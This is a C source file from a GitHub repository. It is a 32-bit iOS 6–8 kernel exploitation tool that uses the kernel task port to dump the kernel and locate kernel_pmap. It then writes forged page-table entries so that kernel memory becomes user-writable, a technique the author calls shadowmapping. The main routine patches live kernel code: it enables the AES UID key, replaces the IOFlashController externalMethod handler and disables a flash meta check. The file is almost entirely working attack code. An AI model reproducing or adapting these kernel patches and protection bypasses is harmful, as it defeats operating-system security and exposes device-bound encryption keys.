-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathttbthingy.c
847 lines (726 loc) · 26.2 KB
/
ttbthingy.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
/*
* Shadowmapping, a way of bypassing iOS 'kernel page bits protection'.
* (ARM32 only for now obviously.)
*
* Also a very nice and easy way of copying data in and out of kernel memory
* by breaking the barrier entirely. Thank you TTBCR and split TTBR0/TTBR1!<3
*
* Control flow goes like this if you have a write anywhere exploit:
*
* - Find location of kernel_pmap (dereference to get kernel_pmap_store.)
* - Get virtual address of TTE base (struct is as follows...
* typedef struct __pmap_t {
* uint32_t tte_virt;
* uint32_t tte_phys;
* .....
* } pmap_t;
*
* - Write TTE entries.
* - Own the kernel.
* - ???
* - PROFIT.
*
* with love from @winocm, greets to @planetbeing for patchfinder.
*
* Optimally, this would be best done with a write/read kernel exploit primitive set,
* however, you can do this with a write-only one if you use static offsets (which will work,
* as the kernel isn't randomized in physical memory space.)
*/
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <mach/machine.h>
#include <mach/mach.h>
#include "ioflash/externalMethod.h"
#include <CoreFoundation/CoreFoundation.h>
/*
* ARM page bits for L1 sections.
*/
#define L1_SHIFT 20 /* log2(1MB) */
#define L1_SECT_PROTO (1 << 1) /* 0b10 */
#define L1_SECT_B_BIT (1 << 2)
#define L1_SECT_C_BIT (1 << 3)
#define L1_SECT_SORDER (0) /* 0b00, not cacheable, strongly ordered. */
#define L1_SECT_SH_DEVICE (L1_SECT_B_BIT)
#define L1_SECT_WT_NWA (L1_SECT_C_BIT)
#define L1_SECT_WB_NWA (L1_SECT_B_BIT | L1_SECT_C_BIT)
#define L1_SECT_S_BIT (1 << 16)
#define L1_SECT_AP_URW (1 << 10) | (1 << 11)
#define L1_SECT_PFN(x) (x & 0xFFF00000)
#define L1_SECT_DEFPROT (L1_SECT_AP_URW)
#define L1_SECT_DEFCACHE (L1_SECT_SORDER)
#define L1_PROTO_TTE(paddr) (L1_SECT_PFN(paddr) | L1_SECT_S_BIT | L1_SECT_DEFPROT | L1_SECT_DEFCACHE | L1_SECT_PROTO)
#define PFN_SHIFT 2
#define TTB_OFFSET(vaddr) ((vaddr >> L1_SHIFT) << PFN_SHIFT)
/*
* RAM physical base begin.
*/
#define S5L8930_PHYS_OFF 0x40000000
#define S5L8940_PHYS_OFF 0x80000000 /* Note: RAM base is identical for 8940-8955. */
//#define PHYS_OFF S5L8930_PHYS_OFF
/*
* Shadowmap begin and end. 15MB of shadowmap is enough for the kernel.
* We don't need to invalidate unified D/I TLB or any cache lines
* since the kernel is mapped as writethrough memory, and these
* addresses are guaranteed to not be translated.
* (Accesses will cause segmentation faults due to failure on L1 translation.)
*
* Clear the shadowmappings when done owning the kernel.
*
* 0x7ff0'0000 is also below the limit for vm_read and such, so that's also *great*.
* (2048 bytes)
*/
#define SHADOWMAP_BEGIN 0x7f000000
#define SHADOWMAP_END 0x7ff00000
#define SHADOWMAP_GRANULARITY 0x00100000
#define SHADOWMAP_SIZE_BYTES (SHADOWMAP_END - SHADOWMAP_BEGIN)
#define SHADOWMAP_BEGIN_OFF TTB_OFFSET(SHADOWMAP_BEGIN)
#define SHADOWMAP_END_OFF TTB_OFFSET(SHADOWMAP_END)
#define SHADOWMAP_SIZE (SHADOWMAP_END_OFF - SHADOWMAP_BEGIN_OFF)
#define SHADOWMAP_BEGIN_IDX (SHADOWMAP_BEGIN_OFF >> PFN_SHIFT)
#define SHADOWMAP_END_IDX (SHADOWMAP_END_OFF >> PFN_SHIFT)
#define TTB_SIZE 4096
#define DEFAULT_KERNEL_SLIDE 0x80000000
static mach_port_t kernel_task = 0;
static uint32_t ttb_template[TTB_SIZE] = {};
static void* ttb_template_ptr = &ttb_template[0];
static vm_address_t kernel_base = DEFAULT_KERNEL_SLIDE;
typedef struct pmap_partial_t {
uint32_t tte_virt;
uint32_t tte_phys;
/* ... */
} pmap_partial_t;
/* --- planetbeing patchfinder --- */
static uint32_t bit_range(uint32_t x, int start, int end)
{
x = (x << (31 - start)) >> (31 - start);
x = (x >> end);
return x;
}
static uint32_t ror(uint32_t x, int places)
{
return (x >> places) | (x << (32 - places));
}
static int thumb_expand_imm_c(uint16_t imm12)
{
if(bit_range(imm12, 11, 10) == 0)
{
switch(bit_range(imm12, 9, 8))
{
case 0:
return bit_range(imm12, 7, 0);
case 1:
return (bit_range(imm12, 7, 0) << 16) | bit_range(imm12, 7, 0);
case 2:
return (bit_range(imm12, 7, 0) << 24) | (bit_range(imm12, 7, 0) << 8);
case 3:
return (bit_range(imm12, 7, 0) << 24) | (bit_range(imm12, 7, 0) << 16) | (bit_range(imm12, 7, 0) << 8) | bit_range(imm12, 7, 0);
default:
return 0;
}
} else
{
uint32_t unrotated_value = 0x80 | bit_range(imm12, 6, 0);
return ror(unrotated_value, bit_range(imm12, 11, 7));
}
}
static int insn_is_32bit(uint16_t* i)
{
return (*i & 0xe000) == 0xe000 && (*i & 0x1800) != 0x0;
}
static int insn_is_bl(uint16_t* i)
{
if((*i & 0xf800) == 0xf000 && (*(i + 1) & 0xd000) == 0xd000)
return 1;
else if((*i & 0xf800) == 0xf000 && (*(i + 1) & 0xd001) == 0xc000)
return 1;
else
return 0;
}
static uint32_t insn_bl_imm32(uint16_t* i)
{
uint16_t insn0 = *i;
uint16_t insn1 = *(i + 1);
uint32_t s = (insn0 >> 10) & 1;
uint32_t j1 = (insn1 >> 13) & 1;
uint32_t j2 = (insn1 >> 11) & 1;
uint32_t i1 = ~(j1 ^ s) & 1;
uint32_t i2 = ~(j2 ^ s) & 1;
uint32_t imm10 = insn0 & 0x3ff;
uint32_t imm11 = insn1 & 0x7ff;
uint32_t imm32 = (imm11 << 1) | (imm10 << 12) | (i2 << 22) | (i1 << 23) | (s ? 0xff000000 : 0);
return imm32;
}
static int insn_is_b_conditional(uint16_t* i)
{
return (*i & 0xF000) == 0xD000 && (*i & 0x0F00) != 0x0F00 && (*i & 0x0F00) != 0xE;
}
static int insn_is_b_unconditional(uint16_t* i)
{
if((*i & 0xF800) == 0xE000)
return 1;
else if((*i & 0xF800) == 0xF000 && (*(i + 1) & 0xD000) == 9)
return 1;
else
return 0;
}
static int insn_is_ldr_literal(uint16_t* i)
{
return (*i & 0xF800) == 0x4800 || (*i & 0xFF7F) == 0xF85F;
}
static int insn_ldr_literal_rt(uint16_t* i)
{
if((*i & 0xF800) == 0x4800)
return (*i >> 8) & 7;
else if((*i & 0xFF7F) == 0xF85F)
return (*(i + 1) >> 12) & 0xF;
else
return 0;
}
static int insn_ldr_literal_imm(uint16_t* i)
{
if((*i & 0xF800) == 0x4800)
return (*i & 0xF) << 2;
else if((*i & 0xFF7F) == 0xF85F)
return (*(i + 1) & 0xFFF) * (((*i & 0x0800) == 0x0800) ? 1 : -1);
else
return 0;
}
// TODO: More encodings
static int insn_ldr_imm_rt(uint16_t* i)
{
return (*i & 7);
}
static int insn_ldr_imm_rn(uint16_t* i)
{
return ((*i >> 3) & 7);
}
static int insn_ldr_imm_imm(uint16_t* i)
{
return ((*i >> 6) & 0x1F);
}
int insn_ldr_reg_rt(uint16_t* i)
{
if((*i & 0xFE00) == 0x5800)
return *i & 0x7;
else if((*i & 0xFFF0) == 0xF850 && (*(i + 1) & 0x0FC0) == 0x0000)
return (*(i + 1) >> 12) & 0xF;
else
return 0;
}
int insn_ldr_reg_rm(uint16_t* i)
{
if((*i & 0xFE00) == 0x5800)
return (*i >> 6) & 0x7;
else if((*i & 0xFFF0) == 0xF850 && (*(i + 1) & 0x0FC0) == 0x0000)
return *(i + 1) & 0xF;
else
return 0;
}
static int insn_is_add_reg(uint16_t* i)
{
if((*i & 0xFE00) == 0x1800)
return 1;
else if((*i & 0xFF00) == 0x4400)
return 1;
else if((*i & 0xFFE0) == 0xEB00)
return 1;
else
return 0;
}
static int insn_add_reg_rd(uint16_t* i)
{
if((*i & 0xFE00) == 0x1800)
return (*i & 7);
else if((*i & 0xFF00) == 0x4400)
return (*i & 7) | ((*i & 0x80) >> 4) ;
else if((*i & 0xFFE0) == 0xEB00)
return (*(i + 1) >> 8) & 0xF;
else
return 0;
}
static int insn_add_reg_rn(uint16_t* i)
{
if((*i & 0xFE00) == 0x1800)
return ((*i >> 3) & 7);
else if((*i & 0xFF00) == 0x4400)
return (*i & 7) | ((*i & 0x80) >> 4) ;
else if((*i & 0xFFE0) == 0xEB00)
return (*i & 0xF);
else
return 0;
}
static int insn_add_reg_rm(uint16_t* i)
{
if((*i & 0xFE00) == 0x1800)
return (*i >> 6) & 7;
else if((*i & 0xFF00) == 0x4400)
return (*i >> 3) & 0xF;
else if((*i & 0xFFE0) == 0xEB00)
return *(i + 1) & 0xF;
else
return 0;
}
static int insn_is_movt(uint16_t* i)
{
return (*i & 0xFBF0) == 0xF2C0 && (*(i + 1) & 0x8000) == 0;
}
static int insn_movt_rd(uint16_t* i)
{
return (*(i + 1) >> 8) & 0xF;
}
static int insn_movt_imm(uint16_t* i)
{
return ((*i & 0xF) << 12) | ((*i & 0x0400) << 1) | ((*(i + 1) & 0x7000) >> 4) | (*(i + 1) & 0xFF);
}
static int insn_is_mov_imm(uint16_t* i)
{
if((*i & 0xF800) == 0x2000)
return 1;
else if((*i & 0xFBEF) == 0xF04F && (*(i + 1) & 0x8000) == 0)
return 1;
else if((*i & 0xFBF0) == 0xF240 && (*(i + 1) & 0x8000) == 0)
return 1;
else
return 0;
}
static int insn_mov_imm_rd(uint16_t* i)
{
if((*i & 0xF800) == 0x2000)
return (*i >> 8) & 7;
else if((*i & 0xFBEF) == 0xF04F && (*(i + 1) & 0x8000) == 0)
return (*(i + 1) >> 8) & 0xF;
else if((*i & 0xFBF0) == 0xF240 && (*(i + 1) & 0x8000) == 0)
return (*(i + 1) >> 8) & 0xF;
else
return 0;
}
static int insn_mov_imm_imm(uint16_t* i)
{
if((*i & 0xF800) == 0x2000)
return *i & 0xF;
else if((*i & 0xFBEF) == 0xF04F && (*(i + 1) & 0x8000) == 0)
return thumb_expand_imm_c(((*i & 0x0400) << 1) | ((*(i + 1) & 0x7000) >> 4) | (*(i + 1) & 0xFF));
else if((*i & 0xFBF0) == 0xF240 && (*(i + 1) & 0x8000) == 0)
return ((*i & 0xF) << 12) | ((*i & 0x0400) << 1) | ((*(i + 1) & 0x7000) >> 4) | (*(i + 1) & 0xFF);
else
return 0;
}
// Given an instruction, search backwards until an instruction is found matching the specified criterion.
static uint16_t* find_last_insn_matching(uint32_t region, uint8_t* kdata, size_t ksize, uint16_t* current_instruction, int (*match_func)(uint16_t*))
{
while((uintptr_t)current_instruction > (uintptr_t)kdata)
{
if(insn_is_32bit(current_instruction - 2) && !insn_is_32bit(current_instruction - 3))
{
current_instruction -= 2;
} else
{
--current_instruction;
}
if(match_func(current_instruction))
{
return current_instruction;
}
}
return NULL;
}
// Given an instruction and a register, find the PC-relative address that was stored inside the register by the time the instruction was reached.
static uint32_t find_pc_rel_value(uint32_t region, uint8_t* kdata, size_t ksize, uint16_t* insn, int reg)
{
// Find the last instruction that completely wiped out this register
int found = 0;
uint16_t* current_instruction = insn;
while((uintptr_t)current_instruction > (uintptr_t)kdata)
{
if(insn_is_32bit(current_instruction - 2))
{
current_instruction -= 2;
} else
{
--current_instruction;
}
if(insn_is_mov_imm(current_instruction) && insn_mov_imm_rd(current_instruction) == reg)
{
found = 1;
break;
}
if(insn_is_ldr_literal(current_instruction) && insn_ldr_literal_rt(current_instruction) == reg)
{
found = 1;
break;
}
}
if(!found)
return 0;
// Step through instructions, executing them as a virtual machine, only caring about instructions that affect the target register and are commonly used for PC-relative addressing.
uint32_t value = 0;
while((uintptr_t)current_instruction < (uintptr_t)insn)
{
if(insn_is_mov_imm(current_instruction) && insn_mov_imm_rd(current_instruction) == reg)
{
value = insn_mov_imm_imm(current_instruction);
} else if(insn_is_ldr_literal(current_instruction) && insn_ldr_literal_rt(current_instruction) == reg)
{
value = *(uint32_t*)(kdata + (((((uintptr_t)current_instruction - (uintptr_t)kdata) + 4) & 0xFFFFFFFC) + insn_ldr_literal_imm(current_instruction)));
} else if(insn_is_movt(current_instruction) && insn_movt_rd(current_instruction) == reg)
{
value |= insn_movt_imm(current_instruction) << 16;
} else if(insn_is_add_reg(current_instruction) && insn_add_reg_rd(current_instruction) == reg)
{
if(insn_add_reg_rm(current_instruction) != 15 || insn_add_reg_rn(current_instruction) != reg)
{
// Can't handle this kind of operation!
return 0;
}
value += ((uintptr_t)current_instruction - (uintptr_t)kdata) + 4;
}
current_instruction += insn_is_32bit(current_instruction) ? 2 : 1;
}
return value;
}
// Find PC-relative references to a certain address (relative to kdata). This is basically a virtual machine that only cares about instructions used in PC-relative addressing, so no branches, etc.
static uint16_t* find_literal_ref(uint32_t region, uint8_t* kdata, size_t ksize, uint16_t* insn, uint32_t address)
{
uint16_t* current_instruction = insn;
uint32_t value[16];
memset(value, 0, sizeof(value));
while((uintptr_t)current_instruction < (uintptr_t)(kdata + ksize))
{
if(insn_is_mov_imm(current_instruction))
{
value[insn_mov_imm_rd(current_instruction)] = insn_mov_imm_imm(current_instruction);
} else if(insn_is_ldr_literal(current_instruction))
{
uintptr_t literal_address = (uintptr_t)kdata + ((((uintptr_t)current_instruction - (uintptr_t)kdata) + 4) & 0xFFFFFFFC) + insn_ldr_literal_imm(current_instruction);
if(literal_address >= (uintptr_t)kdata && (literal_address + 4) <= ((uintptr_t)kdata + ksize))
{
value[insn_ldr_literal_rt(current_instruction)] = *(uint32_t*)(literal_address);
}
} else if(insn_is_movt(current_instruction))
{
value[insn_movt_rd(current_instruction)] |= insn_movt_imm(current_instruction) << 16;
} else if(insn_is_add_reg(current_instruction))
{
int reg = insn_add_reg_rd(current_instruction);
if(insn_add_reg_rm(current_instruction) == 15 && insn_add_reg_rn(current_instruction) == reg)
{
value[reg] += ((uintptr_t)current_instruction - (uintptr_t)kdata) + 4;
if(value[reg] == address)
{
return current_instruction;
}
}
}
current_instruction += insn_is_32bit(current_instruction) ? 2 : 1;
}
return NULL;
}
// This points to kernel_pmap. Use that to change the page tables if necessary.
uint32_t find_pmap_location(uint32_t region, uint8_t* kdata, size_t ksize)
{
// Find location of the pmap_map_bd string.
uint8_t* pmap_map_bd = memmem(kdata, ksize, "\"pmap_map_bd\"", sizeof("\"pmap_map_bd\""));
if(!pmap_map_bd)
return 0;
// Find a reference to the pmap_map_bd string. That function also references kernel_pmap
uint16_t* ptr = find_literal_ref(region, kdata, ksize, (uint16_t*) kdata, (uintptr_t)pmap_map_bd - (uintptr_t)kdata);
if(!ptr)
return 0;
printf("pmap_map_bd xref at %p\n", ptr);
//hax for iOS 8, panic("\"pmap_map_bd\"") call is located *after* the end of function so go back a bit
ptr -= 0x10;
// Find the end of it.
const uint8_t search_function_end[] = {0xF0, 0xBD};// POP {R4-R7,PC}
ptr = memmem(ptr, ksize - ((uintptr_t)ptr - (uintptr_t)kdata), search_function_end, sizeof(search_function_end));
if(!ptr)
return 0;
// Find the last BL before the end of it. The third argument to it should be kernel_pmap
uint16_t* bl = find_last_insn_matching(region, kdata, ksize, ptr, insn_is_bl);
if(!bl)
return 0;
// Find the last LDR R2, [R*] before it that's before any branches. If there are branches, then we have a version of the function that assumes kernel_pmap instead of being passed it.
uint16_t* ldr_r2 = NULL;
uint16_t* current_instruction = bl;
while((uintptr_t)current_instruction > (uintptr_t)kdata)
{
if(insn_is_32bit(current_instruction - 2) && !insn_is_32bit(current_instruction - 3))
{
current_instruction -= 2;
} else
{
--current_instruction;
}
if(insn_ldr_imm_rt(current_instruction) == 2 && insn_ldr_imm_imm(current_instruction) == 0)
{
ldr_r2 = current_instruction;
break;
} else if(insn_is_b_conditional(current_instruction) || insn_is_b_unconditional(current_instruction))
{
break;
}
}
// The function has a third argument, which must be kernel_pmap. Find out its address
if(ldr_r2)
return find_pc_rel_value(region, kdata, ksize, ldr_r2, insn_ldr_imm_rn(ldr_r2));
// The function has no third argument, Follow the BL.
uint32_t imm32 = insn_bl_imm32(bl);
uint32_t target = ((uintptr_t)bl - (uintptr_t)kdata) + 4 + imm32;
if(target > ksize)
return 0;
// Find the first PC-relative reference in this function.
int found = 0;
int rd;
current_instruction = (uint16_t*)(kdata + target);
while((uintptr_t)current_instruction < (uintptr_t)(kdata + ksize))
{
if(insn_is_add_reg(current_instruction) && insn_add_reg_rm(current_instruction) == 15)
{
found = 1;
rd = insn_add_reg_rd(current_instruction);
current_instruction += insn_is_32bit(current_instruction) ? 2 : 1;
break;
}
current_instruction += insn_is_32bit(current_instruction) ? 2 : 1;
}
if(!found)
return 0;
return find_pc_rel_value(region, kdata, ksize, current_instruction, rd);
}
/* --- planetbeing patchfinder --- */
//from https://github.com/saelo/ios-kern-utils/blob/master/lib/kernel/base.c
vm_address_t get_kernel_base()
{
kern_return_t ret;
task_t kernel_task;
vm_region_submap_info_data_64_t info;
vm_size_t size;
mach_msg_type_number_t info_count = VM_REGION_SUBMAP_INFO_COUNT_64;
unsigned int depth = 0;
vm_address_t addr = 0x81200000;
//arm64
//addr = 0xffffff8000000000;
ret = task_for_pid(mach_task_self(), 0, &kernel_task);
if (ret != KERN_SUCCESS)
{
printf("task_for_pid(0) returned=%x\n", ret);
return -1;
}
while (1) {
ret = vm_region_recurse_64(kernel_task, &addr, &size, &depth, (vm_region_info_t) & info, &info_count);
//printf("addr=0x%llx\n", addr);
if (ret != KERN_SUCCESS)
break;
if (size > 1024 * 1024 * 1024)
return addr;
addr += size;
}
return -1;
}
static void generate_ttb_entries(uint32_t ram_base)
{
uint32_t vaddr, vaddr_end, paddr, i;
paddr = ram_base;
vaddr = SHADOWMAP_BEGIN;
vaddr_end = SHADOWMAP_END;
for(i = vaddr; i <= vaddr_end; i += SHADOWMAP_GRANULARITY, paddr += SHADOWMAP_GRANULARITY) {
printf("ProtoTTE: 0x%08x for VA 0x%08x -> PA 0x%08x\n", L1_PROTO_TTE(paddr), i, paddr);
ttb_template[TTB_OFFSET(i) >> PFN_SHIFT] = L1_PROTO_TTE(paddr);
}
printf("TTE offset begin for shadowmap: 0x%08x\n"
"TTE offset end for shadowmap: 0x%08x\n"
"TTE size: 0x%08x\n",
SHADOWMAP_BEGIN_OFF, SHADOWMAP_END_OFF, SHADOWMAP_SIZE);
return;
}
#define DMPSIZE 0xF00000
void do_kernel_patchs();
CF_EXPORT const CFStringRef _kCFSystemVersionProductVersionKey;
CF_EXPORT CFDictionaryRef _CFCopySystemVersionDictionary(void);
int check_ios_version()
{
//http://stackoverflow.com/questions/20104403/determine-if-ios-device-is-32-or-64-bit
size_t size;
cpu_type_t type;
size = sizeof(type);
sysctlbyname("hw.cputype", &type, &size, NULL, 0);
if(type != CPU_TYPE_ARM)
{
printf("Only 32 bit devices are supported !\n");
return 0;
}
CFStringRef version = NULL;
CFDictionaryRef versionDict = _CFCopySystemVersionDictionary();
if(versionDict == NULL)
return 0;
version = CFDictionaryGetValue(versionDict, _kCFSystemVersionProductVersionKey);
if(version == NULL)
return 0;
CFArrayRef arr = CFStringCreateArrayBySeparatingStrings(kCFAllocatorDefault, version, CFSTR("."));
if(arr == NULL)
return 0;
SInt32 major = CFStringGetIntValue(CFArrayGetValueAtIndex(arr, 0));
printf("iOS major version: %ld\n", major);
if(major != 8 && major != 7 && major != 6)
{
printf("Unsupported iOS version !\n");
return 0;
}
return 1;
}
int main(int argc, char* argv[])
{
uint32_t chunksize = 2048;
if(!check_ios_version())
{
return 0;
}
printf("calling get_kernel_base\n");
/* get kernel base. */
kernel_base = get_kernel_base();
if(kernel_base == -1) {
printf("failed to get kernel base...\n");
return -1;
}
kernel_base += 0x1000;
printf("kernel_base=%p\n", (void*) kernel_base);
/* we can now find the kernel pmap. */
kern_return_t r = task_for_pid(mach_task_self(), 0, &kernel_task);
if(r != 0)
{
printf("task_for_pid fail\n");
return -1;
}
//hax, sometimes on iOS7 kernel starts at +0x200000 in the 1Gb region
pointer_t buf;
mach_msg_type_number_t sz = 0x500;
kernel_base += 0x200000;
vm_read(kernel_task, kernel_base, chunksize, &buf, &sz);
printf("@ %p => %x\n", (void*) kernel_base, *((uint32_t*)buf));
if(*((uint32_t*)buf) != 0xfeedface)
{
kernel_base -= 0x200000;
vm_read(kernel_task, kernel_base, chunksize, &buf, &sz);
printf("@ %p => %x\n", (void*) kernel_base, *((uint32_t*)buf));
if(*((uint32_t*)buf) != 0xfeedface)
{
printf("Failed to find feedface at kernelbase +0/0x200000\n");
return 0;
}
}
/* kill */
vm_address_t addr = kernel_base + 0x1000, e = 0;
uint8_t* p = malloc(DMPSIZE + 0x1000);
if(!p) {
printf("failed to malloc memory for kernel dump...\n");
return -1;
}
while(addr < (kernel_base + DMPSIZE))
{
vm_read(kernel_task, addr, chunksize, &buf, &sz);
if(!buf || sz == 0)
continue;
uint8_t* z = (uint8_t*) buf;
addr += chunksize;
bcopy(z, p + e, chunksize);
e += chunksize;
}
/*printf("writing kernel to kdump.bin\n");
FILE *fp = fopen("kdump.bin", "wb");
fwrite((void*)p, DMPSIZE, 1, fp);
fclose(fp);
return 0;*/
/* kernel dumped, now find pmap. */
uint32_t kernel_pmap = kernel_base + 0x1000 + find_pmap_location(kernel_base, (uint8_t*)p, DMPSIZE);
printf("kernel pmap is at 0x%08x\n", kernel_pmap);
//TODO add more sanity checks
/* Read for kernel_pmap, dereference it for pmap_store. */
vm_read(kernel_task, kernel_pmap, 2048, &buf, &sz);
vm_address_t pmap_store = *(vm_address_t*)(buf);
printf("pmap_store= %p\n", (void*) pmap_store);
if(!pmap_store)
{
return 0;
}
vm_read(kernel_task, pmap_store, 2048, &buf, &sz);
/*
* We now have the struct. Let's copy it out to get the TTE base (we don't really need to do this
* as it should just remain constant. TTEs should be after ToKD.)
*/
pmap_partial_t* part = (pmap_partial_t*)buf;
uint32_t tte_virt = part->tte_virt;
uint32_t tte_phys = part->tte_phys;
printf("kernel pmap tte base is at VA 0x%08x PA 0x%08x\n", tte_virt, tte_phys);
uint32_t ram_base = tte_phys & 0xF0000000;//hax
printf("ram base 0x%08x\n", ram_base);
/* generate TTEs. */
generate_ttb_entries(ram_base);
/* Now, we can start reading at the TTE base and start writing in the descriptors. */
uint32_t tte_off = SHADOWMAP_BEGIN_OFF;
vm_read(kernel_task, tte_virt + tte_off, 2048, &buf, &sz);
bcopy((char*)ttb_template_ptr + tte_off, (void*)buf, SHADOWMAP_SIZE);
vm_write(kernel_task, tte_virt + tte_off, buf, sz);
/* Haxx done, write out the kernel. :) */
//printf("done writing descriptors, dumping the kernel via shadow mapping now\n");
//sleep(2);//hax, need to flush caches ?
do_kernel_patchs();
return 0;
}
void do_kernel_patchs()
{
/**
com.apple.iokit.IOCryptoAcceleratorFamily:__text:8094BD48 B0 F5 FA 6F CMPNE.W R0, #0x7D0
com.apple.iokit.IOCryptoAcceleratorFamily:__text:8094BD4C 00 F0 A2 80 BEQ.W loc_8094BE94
=> B0 F5 FA 6F 00 F0 A2 80
**/
uint8_t* ptr = (uint8_t*) SHADOWMAP_BEGIN;
uint8_t* iomem = 0x0, *addr=0;
while(ptr < ((uint8_t*)SHADOWMAP_END))
{
if(!memcmp(ptr, "\xB0\xF5\xFA\x6F\x00\xF0\xA2\x80", 8)//ios7
|| !memcmp(ptr, "\xB0\xF5\xFA\x6F\x00\xF0\x92\x80", 8)//ios6
|| !memcmp(ptr, "\xB0\xF5\xFA\x6F\x00\xF0\x82\x80", 8))//ios8
{
printf("Patching IOSAESAccelerator enable uid key !\n");
ptr += 4;
*((uint32_t*) ptr) = 0x460c460c;
}
//if(!memcmp(ptr, "\xF0\xB5\x03\xAF\x4D\xF8\x04\x8D\x8B\xB0\x15\x46\x40\xF2\xC2\x26", 16))
//IOFlashControllerUserClient::externalMethod
if(!memcmp(ptr, "\xF0\xB5\x03\xAF\x4D\xF8\x04\x8D\x8B\xB0\x15\x46", 12)
||!memcmp(ptr, "\xF0\xB5\x03\xAF\x4D\xF8\x04\x8D\x8B\xB0\x16\x46", 12))//ios8
{
addr = (ptr - SHADOWMAP_BEGIN) + kernel_base - 0x1000;
printf("Found ioFlash at %p\n", addr);
if(!iomem)
{
printf("But missing IOMemoryDescriptor::withAddress !\n");
}
else
{
iomem = (uint8_t*) -(addr + 2 + 0xC - (iomem + 1));
printf("delta = %p\n", iomem);
memcpy(ptr, externalMethod_bin, externalMethod_bin_len);
memcpy(ptr + externalMethod_bin_len, &iomem, 4);
}
}
if(!memcmp(ptr, "\xF0\xB5\x03\xAF\x2D\xE9\x00\x0D\x81\xB0\x06\x46\x64\x20\x9B\x46", 16))
{
if(iomem == 0)
{
iomem = (ptr - SHADOWMAP_BEGIN) + kernel_base - 0x1000;
printf("Found IOMemoryDescriptor::withAddress at %p\n", iomem);
}
}
//meta fringe
if(!memcmp(ptr, "\xF0\xB5\x03\xAF\x81\xB0\x1C\x46\x15\x46\x0E\x46\xB5\x42", 14)
||!memcmp(ptr, "\xF0\xB5\x03\xAF\x81\xB0\x1C\x46\x15\x46\x0E\x46\xAE\x42", 14))//ios8
{
printf("Found AppleIOPFMI::_fmiPatchMetaFringe\n");
*((uint32_t*) ptr) = 0x47704770;
}
ptr += 2;
}
}